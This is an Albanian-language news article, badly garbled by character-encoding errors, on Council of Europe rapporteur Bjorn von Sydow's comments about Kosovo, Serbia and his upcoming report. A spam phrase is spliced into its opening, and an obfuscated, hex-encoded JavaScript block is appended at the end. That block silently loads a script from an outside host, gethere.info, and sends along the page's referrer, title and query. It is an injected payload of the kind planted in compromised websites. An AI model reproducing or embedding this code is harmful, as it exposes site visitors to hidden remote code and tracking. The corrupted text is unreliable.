vod136_EN

a�?KatA�r milionA� kosovarA� – tA� jetojnA� si evropianA�a�?

healthy man viagra ad. Nuk do dA�rgoj KosovA�n nA� KA�shillin e EvropA�s, thotA� pA�r mediat serbe raportuesi i KE-sA� pA�r KosovA�n, Bjorn von Sydow, i cili do tA� qA�ndrojA� tre ditA� nA� Beograd, pA�r tA� mbledh informacione pA�r raportin e e janarit, pas tA� cilit do tA� miratohet njA� rezolutA�.

a�?Dua tA� kem njohuri se si autoritetet nA� Serbi i shohin standardet nA� KosovA�. Pres qA� bisedimet tA� fokusohen nA� pakicA�n serbe, pA�rfshirA� serbA�t nA� veri tA� KosovA�s dhe raportet e tyre. Sepse, standardet janA� nA� fokus tA� raportit tima�?, ka thA�nA� Syadow.

Ai thotA� se nuk do tA� bisedojA� pA�r a�?statusin e KosovA�sa�?e as qA� do tA� jetA� kjo temA� pjesA� e raportit tA� tij.

a�?SerbA�t e KosovA�s kanA� lidhje me administratA�n nA� Serbi. Kjo A�shtA� arsyeja pse unA� po vij. NdA�rsa, Serbia A�shtA� anA�tare e KE-sA�a�?, shton Sydow pA�r a�?Vecernje Novostia�?.

NA� pyetjen se A�farA� pA�rshtypje ka nga Kosova, meqA� ishte kohA� mA� parA� kA�tu, ai thotA� se demokracia dhe tA� drejtat e njeriut po ecin nA� drejtimin e duhur, a�?por se kjo kA�rkon kohA�a�?.

a�?Fola me autoritetet nA� PrishtinA� pA�r korrupsionin, krimin, sundimin e ligjit, mungesa e efikasitetit nA� sistem, statusi i gruas, dhuna nA� familje… ShumA� hapa tjerA� duhet tA� ndA�rmerrena�?.

Sydow thotA� mohon se raporti i tij A�shtA� justifikim pA�r pranimin e KosovA�s nA� BE, siA� flitet nA� korridoret e Strasburgut?

a�?Kam vendosur ta lA� jashtA� kA�tA� A�A�shtje nga raporti. Nuk do tA� merrem me kA�tA�, sepse mendoj se mA� me rA�ndA�si A�shtA� qA� afA�r katA�r milionA� njerA�z nga Kosova duhet tA� jetojnA� sipas standardeve evropianea�?.

Kur u pA�rmend shifra katA�r milionA�, pA�r A�ka reagon gazetari, Sydow pA�rgjigjet: a�?Varet se A�ka nA�nkuptohet me banorA�, nA�se janA� vetA�m ata qA� jetojnA� nA� KosovA�, apo ata qA� gjenden nA� Gjermani dhe ZvicA�r. NA� A�do rast, tA� gjithA� ata janA� qytetarA� tA� KosovA�sa�?.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}